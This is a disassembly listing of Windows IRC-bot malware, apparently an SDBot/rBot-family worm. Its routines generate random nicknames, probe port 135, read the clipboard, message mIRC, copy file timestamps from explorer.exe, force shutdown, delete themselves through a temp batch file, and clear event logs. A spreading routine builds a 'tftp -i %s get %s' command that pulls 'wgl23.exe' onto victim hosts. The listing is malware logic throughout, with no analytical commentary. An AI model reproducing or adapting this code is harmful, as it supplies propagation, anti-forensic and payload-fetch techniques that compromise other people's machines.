mov al, byte ptr a__3[eax] ; "-|`_\\{[]}"
mov [ebx], al
loc_418805: ; CODE XREF: sub_418688+111�j
; sub_418688+122�j ...
push [ebp+Count] ; Count
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dst]
push eax ; Dest
call _strncat
add esp, 0Ch
loc_418818: ; CODE XREF: sub_418688+D0�j
lea eax, [ebp+Dst]
push eax ; Str
call _strlen
mov esi, eax
movsx eax, [ebp+esi+var_2D]
lea ebx, [ebp+esi+Dst]
push eax ; C
mov [ebp+var_4], esi
call _isdigit
pop ecx
test eax, eax
pop ecx
jnz loc_418A80
and [ebp+Count], eax
movsx eax, byte ptr [ebx-1]
push eax ; Val
push edi ; Str
call _strchr
pop ecx
test eax, eax
pop ecx
jnz loc_418977
call _rand
mov dword ptr [ebp+var_18+4], eax
lea eax, [esi+3]
fild dword ptr [ebp+var_18+4]
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul ds:dbl_43D4C0
call __ftol
cmp esi, 3
jz short loc_418886
cmp eax, 1
jnz loc_418977
loc_418886: ; CODE XREF: sub_418688+1F3�j
push 2
cdq
pop ecx
idiv ecx
cmp edx, 1
jnz short loc_4188C8
push edi ; Str
call _strlen
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp qword ptr [ebp-10h]
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul qword ptr [ebp-10h]
fmul ds:dbl_43D4C0
call __ftol
mov al, byte ptr a__3[eax] ; "-|`_\\{[]}"
mov [ebx], al
jmp short loc_4188E4
; ---------------------------------------------------------------------------
loc_4188C8: ; CODE XREF: sub_418688+207�j
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43D4B0
call __ftol
mov cl, 41h
sub cl, al
mov [ebx], cl
loc_4188E4: ; CODE XREF: sub_418688+23E�j
push 1
inc esi
pop ebx
mov [ebp+var_4], esi
mov [ebp+Count], ebx
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43D4A8
call __ftol
cmp esi, 3
jz short loc_41890D
cmp eax, ebx
jnz short loc_418977
loc_41890D: ; CODE XREF: sub_418688+27F�j
push 2
pop ebx
cdq
mov ecx, ebx
idiv ecx
test edx, edx
jnz short loc_418952
push edi ; Str
call _strlen
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp qword ptr [ebp-10h]
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul qword ptr [ebp-10h]
fmul ds:dbl_43D4C0
call __ftol
mov al, byte ptr a__3[eax] ; "-|`_\\{[]}"
mov [ebp+esi+Dst], al
jmp short loc_418970
; ---------------------------------------------------------------------------
loc_418952: ; CODE XREF: sub_418688+28F�j
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43D4B0
call __ftol
mov cl, 41h
sub cl, al
mov [ebp+esi+Dst], cl
loc_418970: ; CODE XREF: sub_418688+2C8�j
inc esi
mov [ebp+Count], ebx
mov [ebp+var_4], esi
loc_418977: ; CODE XREF: sub_418688+1C9�j
; sub_418688+1F8�j ...
cmp esi, 6
jge loc_418A00
cmp esi, 5
jge short loc_418998
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43D4C8
jmp short loc_4189B6
; ---------------------------------------------------------------------------
loc_418998: ; CODE XREF: sub_418688+2FB�j
call _rand
push 8
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
pop eax
sub eax, esi
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul ds:dbl_43D4C0
loc_4189B6: ; CODE XREF: sub_418688+30E�j
call __ftol
test eax, eax
jnz short loc_4189D9
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43D4A0
call __ftol
mov cl, 30h
jmp short loc_4189F6
; ---------------------------------------------------------------------------
loc_4189D9: ; CODE XREF: sub_418688+335�j
cmp eax, 1
jnz short loc_418A00
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43D4B0
call __ftol
mov cl, 41h
loc_4189F6: ; CODE XREF: sub_418688+34F�j
sub cl, al
mov [ebp+esi+Dst], cl
inc esi
mov [ebp+var_4], esi
loc_418A00: ; CODE XREF: sub_418688+2F2�j
; sub_418688+354�j
cmp [ebp+Count], 2
jge short loc_418A80
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fimul [ebp+var_4]
fmul ds:dbl_43D4C0
call __ftol
cmp eax, 1
jnz short loc_418A80
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43D4A0
call __ftol
mov cl, 30h
sub cl, al
mov [ebp+esi+Dst], cl
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43D498
call __ftol
cmp eax, 1
jnz short loc_418A80
cmp [ebp+Count], eax
jge short loc_418A80
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43D490
call __ftol
mov cl, 30h
sub cl, al
mov [ebp+esi+var_2B], cl
loc_418A80: ; CODE XREF: sub_418688+1B1�j
; sub_418688+37C�j ...
lea eax, [ebp+Dst]
push 14h ; Count
push eax ; Source
push [ebp+Dest] ; Dest
call _strncpy
mov eax, [ebp+Dest]
add esp, 0Ch
pop edi
pop esi
pop ebx
leave
retn
sub_418688 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418A99(int,int,void *Buf2,size_t Size)
sub_418A99 proc near ; CODE XREF: .text:00418BF6�p
; .text:00418C1D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Buf2 = dword ptr 10h
Size = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
sub edi, [ebp+Size]
test edi, edi
jle short loc_418AC7
loc_418AAA: ; CODE XREF: sub_418A99+2C�j
push [ebp+Size] ; Size
mov eax, [ebp+arg_0]
add eax, esi
push [ebp+Buf2] ; Buf2
push eax ; Buf1
call _memcmp
add esp, 0Ch
test eax, eax
jz short loc_418ACD
inc esi
cmp esi, edi
jl short loc_418AAA
loc_418AC7: ; CODE XREF: sub_418A99+F�j
xor al, al
loc_418AC9: ; CODE XREF: sub_418A99+36�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_418ACD: ; CODE XREF: sub_418A99+27�j
mov al, 1
jmp short loc_418AC9
sub_418A99 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 2010h
call __alloca_probe
mov eax, [ebp+0Ch]
push esi
dec eax
push edi
jz short loc_418B12
dec eax
jz short loc_418AF0
dec eax
loc_418AEA: ; CODE XREF: .text:00418B28�j
xor eax, eax
loc_418AEC: ; CODE XREF: .text:00418B10�j
; .text:00418C3A�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_418AF0: ; CODE XREF: .text:00418AE7�j
push 3
push 1388h
push dword ptr [ebp+8]
call dword_4E4260 ; inet_addr
push eax
call sub_40C71F
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
jmp short loc_418AEC
; ---------------------------------------------------------------------------
loc_418B12: ; CODE XREF: .text:00418AE4�j
push 6
push 1
push 2
call dword_4E42A0 ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+0Ch], esi
jz short loc_418AEA
push ebx
xor ebx, ebx
push 10h
lea eax, [ebp-10h]
push ebx
push eax
call _memset
add esp, 0Ch
mov word ptr [ebp-10h], 2
push 87h
call dword_4E4220 ; htons
push dword ptr [ebp+8]
mov [ebp-0Eh], ax
call sub_40AE8D
pop ecx
mov [ebp-0Ch], eax
lea eax, [ebp-10h]
push 10h
push eax
push esi
call dword_4E41C8 ; connect
cmp eax, edi
jz loc_418C2E
push ebx
push 48h
push offset dword_450C48
push esi
call dword_4E4270 ; send
cmp eax, edi
jz loc_418C2E
mov esi, 2000h
push ebx
lea eax, [ebp-2010h]
push esi
push eax
push dword ptr [ebp+0Ch]
call dword_4E4238 ; recv
cmp eax, edi
jz loc_418C2E
cmp byte ptr [ebp-200Eh], 0Ch
jnz short loc_418C2E
push ebx
push 18h
push offset dword_450C94
push dword ptr [ebp+0Ch]
call dword_4E4270 ; send
cmp eax, edi
jz short loc_418C2E
push ebx
lea eax, [ebp-2010h]
push esi
push eax
push dword ptr [ebp+0Ch]
call dword_4E4238 ; recv
mov esi, eax
cmp esi, edi
jz short loc_418C2E
cmp byte ptr [ebp-200Eh], 2
jnz short loc_418C2E
push 10h
push offset dword_450CB0
lea eax, [ebp-2010h]
push esi
push eax
call sub_418A99
add esp, 10h
test al, al
jz short loc_418C0E
cmp esi, 12Ch
setnl bl
inc ebx
jmp short loc_418C2E
; ---------------------------------------------------------------------------
loc_418C0E: ; CODE XREF: .text:00418C00�j
push 10h
push offset dword_450CC4
lea eax, [ebp-2010h]
push esi
push eax
call sub_418A99
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov ebx, eax
loc_418C2E: ; CODE XREF: .text:00418B6C�j
; .text:00418B83�j ...
push dword ptr [ebp+0Ch]
call dword_4E42B8 ; closesocket
mov eax, ebx
pop ebx
jmp loc_418AEC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418C3F(char *Src,char *SubStr,char *Source)
sub_418C3F proc near ; CODE XREF: sub_401CC7+BB8�p
; sub_401CC7+BF5�p ...
Src = dword ptr 8
SubStr = dword ptr 0Ch
Source = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+Src]
xor esi, esi
cmp edi, esi
jz short loc_418CCA
mov eax, [ebp+SubStr]
cmp eax, esi
jz short loc_418CCA
cmp [ebp+Source], esi
jz short loc_418CCA
cmp byte ptr [eax], 0
jz short loc_418CCA
push ebx
push edi ; Src
call __strdup
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_418CC5
push [ebp+SubStr] ; SubStr
push edi ; Str
call _strstr
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_418CBE
sub eax, edi
push eax ; Count
push edi ; Source
push ebx ; Dest
call _strncpy
push [ebp+Source] ; Str
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call _strlen
push eax ; Count
push [ebp+Source] ; Source
push ebx ; Dest
call _strncat
push [ebp+SubStr] ; Str
call _strlen
add eax, esi
push eax ; Source
push ebx ; Dest
call _strcat
push ebx ; Source
push edi ; Dest
call _strcpy
add esp, 30h
mov esi, edi
loc_418CBE: ; CODE XREF: sub_418C3F+3C�j
push ebx ; Memory
call _free
pop ecx
loc_418CC5: ; CODE XREF: sub_418C3F+2B�j
mov eax, esi
pop ebx
jmp short loc_418CCC
; ---------------------------------------------------------------------------
loc_418CCA: ; CODE XREF: sub_418C3F+C�j
; sub_418C3F+13�j ...
xor eax, eax
loc_418CCC: ; CODE XREF: sub_418C3F+89�j
pop edi
pop esi
pop ebp
retn
sub_418C3F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418CD0(char *Str,int)
sub_418CD0 proc near ; CODE XREF: sub_401B4F+E9�p
; sub_410CB5+F4�p
Dst = dword ptr -7D0h
var_7CC = byte ptr -7CCh
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push 7D0h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
mov esi, [ebp+Str]
push esi ; Str
call _strlen
add esp, 10h
push 1
pop ebx
cmp eax, ebx
jge short loc_418D06
or eax, 0FFFFFFFFh
jmp short loc_418D79
; ---------------------------------------------------------------------------
loc_418D06: ; CODE XREF: sub_418CD0+2F�j
xor ecx, ecx
mov [ebp+Dst], esi
test eax, eax
jle short loc_418D28
loc_418D12: ; CODE XREF: sub_418CD0+56�j
mov dl, [ecx+esi]
cmp dl, 0Ah
jz short loc_418D1F
cmp dl, 0Dh
jnz short loc_418D23
loc_418D1F: ; CODE XREF: sub_418CD0+48�j
and byte ptr [ecx+esi], 0
loc_418D23: ; CODE XREF: sub_418CD0+4D�j
inc ecx
cmp ecx, eax
jl short loc_418D12
loc_418D28: ; CODE XREF: sub_418CD0+40�j
xor edx, edx
push edi
test eax, eax
jle short loc_418D59
lea edi, [ebp+var_7CC]
loc_418D35: ; CODE XREF: sub_418CD0+87�j
cmp byte ptr [edx+esi], 0
jnz short loc_418D54
cmp byte ptr [edx+esi+1], 0
lea ecx, [edx+esi+1]
jz short loc_418D54
cmp ebx, 1F4h
jge short loc_418D59
mov [edi], ecx
inc ebx
add edi, 4
loc_418D54: ; CODE XREF: sub_418CD0+69�j
; sub_418CD0+74�j
inc edx
cmp edx, eax
jl short loc_418D35
loc_418D59: ; CODE XREF: sub_418CD0+5D�j
; sub_418CD0+7C�j
cmp [ebp+arg_4], 0
pop edi
jz short loc_418D77
lea eax, [ebp+Dst]
push 7D0h ; Size
push eax ; Src
push [ebp+arg_4] ; Dst
call _memcpy
add esp, 0Ch
loc_418D77: ; CODE XREF: sub_418CD0+8E�j
mov eax, ebx
loc_418D79: ; CODE XREF: sub_418CD0+34�j
pop esi
pop ebx
leave
retn
sub_418CD0 endp
; =============== S U B R O U T I N E =======================================
sub_418D7D proc near ; CODE XREF: sub_418DD7+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
xor esi, esi
rep stosd
lea edi, [eax-1]
test edi, edi
jl short loc_418DB6
push ebx
mov ebx, edi
loc_418D9A: ; CODE XREF: sub_418D7D+36�j
mov eax, [esp+0Ch+arg_0]
mov al, [esi+eax]
push eax
call sub_418DB9
pop ecx
inc esi
mov ecx, [esp+0Ch+arg_8]
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_418D9A
pop ebx
loc_418DB6: ; CODE XREF: sub_418D7D+18�j
pop edi
pop esi
retn
sub_418D7D endp
; =============== S U B R O U T I N E =======================================
sub_418DB9 proc near ; CODE XREF: sub_418D7D+25�p
; sub_418DD7+6B�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax ; C
call _tolower ; _tolower
cmp al, 61h
pop ecx
jl short loc_418DD4
cmp al, 7Ah
jg short loc_418DD4
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_418DD4: ; CODE XREF: sub_418DB9+E�j
; sub_418DB9+12�j
xor eax, eax
retn
sub_418DB9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418DD7(char *Str,int)
sub_418DD7 proc near ; CODE XREF: .text:00415D80�p
; .text:00415E05�p ...
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call __alloca_probe
push ebx
push esi
push edi
push [ebp+Str] ; Str
call _strlen
push [ebp+arg_4] ; Str
mov [ebp+var_4], eax
call _strlen
mov esi, eax
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_418D7D
add esp, 14h
dec esi
mov edi, esi
loc_418E15: ; CODE XREF: sub_418DD7+B6�j
test esi, esi
jle short loc_418E93
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax ; C
call _tolower ; _tolower
mov ebx, eax
mov eax, [ebp+Str]
movsx eax, byte ptr [edi+eax]
push eax ; C
call _tolower ; _tolower
pop ecx
cmp eax, ebx
pop ecx
jz short loc_418E8B
loc_418E3B: ; CODE XREF: sub_418DD7+B2�j
mov ebx, [ebp+Str]
mov al, [edi+ebx]
push eax
call sub_418DB9
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_418E5C
mov eax, ecx
loc_418E5C: ; CODE XREF: sub_418DD7+81�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_418E8F
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax ; C
call _tolower ; _tolower
mov edx, eax
movsx eax, byte ptr [edi+ebx]
push eax ; C
mov [ebp+var_8], edx
call _tolower ; _tolower
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_418E3B
loc_418E8B: ; CODE XREF: sub_418DD7+62�j
dec edi
dec esi
jmp short loc_418E15
; ---------------------------------------------------------------------------
loc_418E8F: ; CODE XREF: sub_418DD7+8A�j
xor eax, eax
jmp short loc_418E98
; ---------------------------------------------------------------------------
loc_418E93: ; CODE XREF: sub_418DD7+40�j
mov eax, [ebp+Str]
add eax, edi
loc_418E98: ; CODE XREF: sub_418DD7+BA�j
pop edi
pop esi
pop ebx
leave
retn
sub_418DD7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418E9D proc near ; CODE XREF: sub_401CC7+68F5�p
; sub_401CC7+79F6�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov esi, eax
push 0
lea eax, [ebp+var_100]
push 100h
push eax
push 400h
push esi
push 0
push 1200h
call ds:dword_4F6460 ; FormatMessageA
lea eax, [ebp+var_100]
loc_418ED6: ; CODE XREF: sub_418E9D+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_418EE2
cmp cl, 9
jnz short loc_418EE5
loc_418EE2: ; CODE XREF: sub_418E9D+3E�j
inc eax
jmp short loc_418ED6
; ---------------------------------------------------------------------------
loc_418EE5: ; CODE XREF: sub_418E9D+43�j
; sub_418E9D+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_418EFF
mov cl, [eax]
cmp cl, 2Eh
jz short loc_418EE5
cmp cl, 21h
jl short loc_418EE5
loc_418EFF: ; CODE XREF: sub_418E9D+54�j
lea eax, [ebp+var_100]
push esi
push eax
mov esi, offset byte_4F3ABC
push [ebp+arg_0]
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h ; Count
push esi ; Dest
call __snprintf
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_418E9D endp
; =============== S U B R O U T I N E =======================================
sub_418F27 proc near ; CODE XREF: sub_401CC7+248A�p
push esi
push 0
call dword_4E41F0 ; OpenClipboard
test eax, eax
jz short loc_418F5E
push 1
call dword_4E4210 ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_418F5E
push edi
push esi
call ds:dword_4F6468 ; GlobalLock
push esi
mov edi, eax
call ds:dword_4F6464 ; GlobalUnlock
call dword_4E4274 ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_418F5E: ; CODE XREF: sub_418F27+B�j
; sub_418F27+19�j
xor eax, eax
pop esi
retn
sub_418F27 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_418F62(char *Format)
sub_418F62 proc near ; CODE XREF: sub_401CC7+77BA�p
Format = dword ptr 4
push ebp
push esi
xor esi, esi
push esi
push offset aMirc_2 ; "mIRC"
call dword_4E422C ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_418FE2
push ebx
push edi
push offset aMirc_3 ; "mIRC"
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call ds:dword_4F6474 ; CreateFileMappingA
push esi
push esi
mov edi, eax
push esi
push 0F001Fh
push edi
call ds:dword_4F6470 ; MapViewOfFile
push [esp+10h+Format] ; Format
mov ebx, eax
push ebx ; Dest
call _sprintf
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call dword_4E427C ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call dword_4E427C ; SendMessageA
push ebx
call ds:dword_4F646C ; UnmapViewOfFile
push edi
call ds:dword_4F6370 ; CloseHandle
push 1
pop eax
pop edi
pop ebx
jmp short loc_418FE4
; ---------------------------------------------------------------------------
loc_418FE2: ; CODE XREF: sub_418F62+14�j
xor eax, eax
loc_418FE4: ; CODE XREF: sub_418F62+7E�j
pop esi
pop ebp
retn
sub_418F62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418FE7 proc near ; CODE XREF: WinMain(x,x,x,x)+212�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
xor esi, esi
push edi
lea eax, [ebp+var_11C]
push esi
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call dword_4E42DC ; SearchPathA
test eax, eax
jz short loc_419086
mov edi, 80h
push esi
push edi
push 3
push esi
mov esi, ds:dword_4F63F4
push 1
lea eax, [ebp+var_11C]
push 80000000h
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_419086
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_4F647C ; GetFileTime
push ebx
mov ebx, ds:dword_4F6370
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_419086
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_4F6478 ; SetFileTime
push esi
call ebx ; CloseHandle
loc_419086: ; CODE XREF: sub_418FE7+2A�j
; sub_418FE7+51�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_418FE7 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 454h
push esi
xor esi, esi
push 10h
lea eax, [ebp-10h]
push esi
push eax
call _memset
push 44h
lea eax, [ebp-54h]
push esi
push eax
call _memset
add esp, 18h
lea eax, [ebp-454h]
mov dword ptr [ebp-54h], 44h
mov dword ptr [ebp-28h], 1
push dword ptr [ebp+0Ch]
mov [ebp-24h], si
push dword ptr [ebp+8]
push offset aSS_11 ; "%s %s"
push 400h
push eax
call __snprintf
add esp, 14h
lea eax, [ebp-10h]
push eax
lea eax, [ebp-54h]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp-454h]
push esi
push eax
push dword ptr [ebp+8]
call ds:dword_4F6374 ; CreateProcessA
neg eax
sbb eax, eax
pop esi
and eax, [ebp-8]
leave
retn
; =============== S U B R O U T I N E =======================================
sub_41910C proc near ; CODE XREF: sub_401CC7+1672�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_41A556
pop ecx
pop ecx
push 50005h
push 6
call dword_4E4160 ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_41910C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41912E proc near ; CODE XREF: sub_401CC7+2746�p
; sub_416F9A+472�p
Str = byte ptr -764h
var_364 = byte ptr -364h
Dest = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
Dst = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push esi
xor esi, esi
cmp dword_44008C, esi
push edi
jz short loc_419152
cmp dword_4E42F0, esi
jnz short loc_419152
push esi ; Str
call sub_401000
pop ecx
loc_419152: ; CODE XREF: sub_41912E+13�j
; sub_41912E+1B�j
call sub_40B957
lea eax, [ebp+Str]
push eax
push 400h
call ds:dword_4F63B8 ; GetTempPathA
lea eax, [ebp+Str]
push eax
lea eax, [ebp+Dest]
push offset aSdel_bat ; "%sdel.bat"
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Dest]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
call ds:dword_4F63F4 ; CreateFileA
mov edi, eax
cmp edi, esi
jbe loc_4192B2
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+Str]
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push edi
call ds:dword_4F63E8 ; WriteFile
push edi
call ds:dword_4F6370 ; CloseHandle
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_58]
pop edi
push edi ; Size
push esi ; Val
push eax ; Dst
call _memset
add esp, 18h
mov [ebp+var_58], edi
mov edi, 104h
lea eax, [ebp+var_15C]
push edi
push eax
push esi
mov [ebp+var_4C], offset dword_4F3CC0
mov [ebp+var_2C], 1
mov [ebp+var_28], si
call ds:dword_4F63A4 ; GetModuleHandleA
push eax
call ds:dword_4F6378 ; GetModuleFileNameA
lea eax, [ebp+var_15C]
push eax
call ds:dword_4F63A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_41925A
lea eax, [ebp+var_15C]
push 80h
push eax
call ds:dword_4F639C ; SetFileAttributesA
loc_41925A: ; CODE XREF: sub_41912E+118�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+var_364]
push edi
push eax
lea eax, [ebp+Str]
push eax
call ds:dword_4F6480 ; ExpandEnvironmentStringsA
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push 4008h
push 1
push esi
lea eax, [ebp+var_364]
push esi
push eax
push esi
call ds:dword_4F6374 ; CreateProcessA
loc_4192B2: ; CODE XREF: sub_41912E+72�j
pop edi
pop esi
leave
retn
sub_41912E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4192B6(int,char *Str,int,int,int)
sub_4192B6 proc near ; CODE XREF: sub_401CC7+7389�p
Dest = byte ptr -294h
Dst = dword ptr -94h
var_84 = dword ptr -84h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 294h
push edi
xor edi, edi
push 94h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
mov [ebp+Dst], 94h
push eax
call ds:dword_4F63D0 ; GetVersionExA
cmp [ebp+var_84], 2
jnz short loc_41934C
push [ebp+arg_10]
push [ebp+arg_C]
call dword_4E41A0 ; OpenEventLogA
push edi
push eax
call dword_4E41B0 ; ClearEventLogA
test eax, eax
jz short loc_41933E
push [ebp+arg_10]
push offset asc_450D90 ; "-"
loc_419317: ; CODE XREF: sub_4192B6+94�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 20h
jmp short loc_419376
; ---------------------------------------------------------------------------
loc_41933E: ; CODE XREF: sub_4192B6+57�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_450DAC
jmp short loc_419317
; ---------------------------------------------------------------------------
loc_41934C: ; CODE XREF: sub_4192B6+3F�j
lea eax, [ebp+Dest]
push offset asc_450DD4 ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 1Ch
loc_419376: ; CODE XREF: sub_4192B6+86�j
pop edi
leave
retn
sub_4192B6 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp-10h]
push edi
push eax
call _memset
add esp, 0Ch
lea eax, [ebp+0Ch]
mov word ptr [ebp-10h], 2
push eax
call dword_4E4260 ; inet_addr
push dword ptr [ebp+0C4h]
mov [ebp-0Ch], eax
call dword_4E4220 ; htons
push edi
push 1
push 2
mov [ebp-0Eh], ax
call dword_4E42A0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+0C4h], esi
jz loc_41947C
lea eax, [ebp-10h]
push 10h
push eax
push esi
call dword_4E41C8 ; connect
cmp eax, 0FFFFFFFFh
jz loc_41947C
mov ebx, 400h
push edi
lea eax, [ebp-5A0h]
push ebx
push eax
push esi
call dword_4E4238 ; recv
mov esi, offset Str ; "wgl23.exe"
push esi
push esi
push dword ptr [ebp+8]
call sub_40AFA9
pop ecx
mov edi, 190h
push eax
push offset aTftpISGetSS ; "tftp -i %s get %s &%s\r\n"
lea eax, [ebp-1A0h]
push edi
push eax
call __snprintf
